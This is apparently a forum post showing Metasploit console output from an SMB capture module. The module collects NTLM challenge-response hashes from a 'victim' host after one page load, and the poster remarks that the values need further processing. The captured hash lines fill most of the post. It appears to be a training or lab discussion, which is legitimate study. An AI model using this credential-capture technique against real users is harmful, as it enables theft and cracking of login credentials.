Show Posts
Code:
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) > [*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e4c33d3f1f2ef7952138d27242654f7a010100000000000029a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:3a453950d098e9b59f88eaa5628bee520101000000000000f9ea2fd3b164ca0112a09ea79a0a637900000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:95782ca14bd78a4c70be953811709d71010100000000000098bb33d3b164ca01ae0245df301f235500000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:8ea08aa689958a547540711096d14aee0101000000000000680138d3b164ca0190afd31a5d8b575a00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:aec3bb6e5d2f6f12bd83c0ef46a9e139010100000000000069bc3cd3b164ca015948d33cd527cce100000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:1ded841a3d184703ef5b115de99d8b3001010000000000004a2941d3b164ca0153d0e59769fe94de00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e8b28d52e979c73f8ef6e8d6dd00ec120101000000000000094845d3b164ca016abaf5dd251d583700000000020000000000000000000000 OS: LM:
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) > [*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e4c33d3f1f2ef7952138d27242654f7a010100000000000029a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:3a453950d098e9b59f88eaa5628bee520101000000000000f9ea2fd3b164ca0112a09ea79a0a637900000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:95782ca14bd78a4c70be953811709d71010100000000000098bb33d3b164ca01ae0245df301f235500000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:8ea08aa689958a547540711096d14aee0101000000000000680138d3b164ca0190afd31a5d8b575a00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:aec3bb6e5d2f6f12bd83c0ef46a9e139010100000000000069bc3cd3b164ca015948d33cd527cce100000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:1ded841a3d184703ef5b115de99d8b3001010000000000004a2941d3b164ca0153d0e59769fe94de00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e8b28d52e979c73f8ef6e8d6dd00ec120101000000000000094845d3b164ca016abaf5dd251d583700000000020000000000000000000000 OS: LM:
You can see that for the same session (loading one page once) I gathered multiple NTLM hash values. And these values need "some processing" before getting the real NTLM hash
Editor-In-Chief : Special Xmas Deal: 10% Off eLearnSecurity Courses
